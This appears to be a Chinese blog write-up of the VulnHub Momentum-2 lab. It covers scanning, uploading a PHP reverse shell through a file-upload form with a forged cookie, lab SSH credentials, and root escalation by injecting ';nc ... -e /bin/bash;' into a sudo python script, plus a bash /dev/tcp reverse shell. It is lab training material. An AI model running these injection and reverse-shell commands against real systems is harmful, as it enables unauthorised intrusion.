靶场练习第二十二天~vulnhub靶场之Momentum-2
一、准备工作
靶机下载地址:Momentum: 2 ~ VulnHub
1.查看kali的ip
使用命令ifconfig
2.使用nmap命令
nmap 192.168.101.0/24
查看开放的端口和协议:nmap -sV 192.168.101.114
二、信息收集
1.使用gobuster,寻找隐藏的网站
gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
发现一个可以上传文件的网站:http://192.168.101.114/dashboard.html
2.利用bp抓包软件将文件上传
上传一句话木马php文件
访问http://192.168.101.114/ajax.php.bak看到一个文件,如果参数为secure,值等于val1d就允许上传pdf、php、txt文件
抓包添加cookie与参数
cookie: admin=&G6u@B6uDXMq&Ms
-----------------------------150269877033212106221702063904
Content-Disposition: form-data; name="secure";
val1d
还有将一句话木马改成反向连接木马,自动生成的反向连接木马地址:https://forum.ywhack.com/reverse-shell/将自动生成的php反向连接脚本替换掉一句话木马
将修改好的数据发送到intruder里面进行爆破
添加要爆破的参数将事先写好的26大写英文字母字典添加到Payload Options爆破返回的长度一样,查看返回的参数哪个有1
将数据上传,可以发现上传成功
三、提权
1.利用php反向连接脚本连接靶机
(1)在kali开启监听功能:nc -lvvp 8888
(2)访问刚才上传的反向连接脚本
(3)看一看kali那边连接情况,已经反向连接成功了
(4)第一个flag
(5)ssh远程连接
发现一个用户密码: athena、myvulnerableapp*,使用命令:ssh athena@192.168.101.114
(6)提权payload
查看该用户的权限并且该用户能够利用引用root相关的执行文件有哪些
1.cat /home/team-tasks/cookie-gen.py
将反弹root权限的shell命令存入seed变量执行
echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.114/4444 <&1'" | base64
1.sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
2.;nc 192.168.101.10 4444 -e /bin/bash;
3.反向连接:nc -lnvp 4444
4.优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):
python -c ‘import pty;pty.spawn(“/bin/bash”)’
5.第二flag
靶场练习第二十二天~vulnhub靶场之Momentum-2相关推荐
- 靶场练习第十二天~vulnhub靶场之dc-4
一.准备工作 1.靶机下载链接 链接: 百度网盘 请输入提取码 提取码: 3hq4 2.用ifconfig查看kali的ip 二.信息收集 1.nmap的信息收集 (1)主机发现 命令:nmap 19 ...
- 靶场练习第二天~vulnhub靶场之 THE PLANETS: EARTH
前期准备: 靶机下载链接: https://pan.baidu.com/s/1_w8OZOPVsQaojq2rnKcdRA 提取码: gguw kali攻击机ip:192.168.101.10 靶机地 ...
- 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...
- 靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie
一.环境搭建 靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub 百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9 二.信息收集 1.nmap命令扫描靶机 先 ...
- vulnhub靶场{GoldenEye-v1靶场实战}
远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- VulnHub靶场LupinOne
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
最新文章
- Python2和Python3除法差别
- android中变量作用域,在 Android 和 Hilt 中限定作用域
- 集合框架(一) ----------Map集合遍历的方法
- 一步步编写操作系统 24 编写内核加载器
- *【POJ - 3659】Cell Phone Network (树形dp,最小支配集)
- ubuntun系统mysql数据库同步_Canal 实现 Mysql数据库实时数据同步
- oracle多表查询while,oracle while的用法示例分享
- python可以做exe文件吗_手动制作python的exe可执行程序
- Himawari-8数据下载及命名
- 安装win10+黑苹果双系统零基础教程
- python ipo模型是指什么?
- 基于单片机的超市储物柜设计_一种超市用储物柜的制作方法
- 统计篇(五)-- 随机变量、样本、统计量
- hadoop2.4.1配置时出现域名解析失败的解决方法
- (21)恢复数据(recovery)时间和撤销数据(removal)时间
- 在计算机领域,美国信息交换标准代码的缩写符号是.,计算机基础在线作业.docx...
- 科林明伦杯哈尔滨理工大学第六届程序设计团队赛-Team模拟
- PHP中终止程序输出的exit和die
- [附源码]Java计算机毕业设计SSM大学生项目众筹系统
- Python批量获取高校基本信息
热门文章
- mysql递归查询所有上下节点_非递归打印二叉树的所有路径,保存父节点和孩子节点到底有啥差别...
- java四神兽_SpringCloud五大神兽之Eureka
- python简单实用案例_Ajax的简单实用实例代码
- springboot mysql时区设置_java/springboot/mysql时区问题解决方案
- html中给div设置的属性怎么样才能拿得到_HTML与CSS结合的三种方式:优先级比较...
- 太和二中计算机考试,安徽省太和二中高二数学下册期末考试试题精选
- 下列不属于html5语义元素,HTML5 新的语义元素
- php js 图片旋转,jQuery实现可以控制图片旋转角度效果
- cefsharp重写默认js弹窗(alert/confirm/prompt)
- Pyqt5+python+ErIC6+QT designer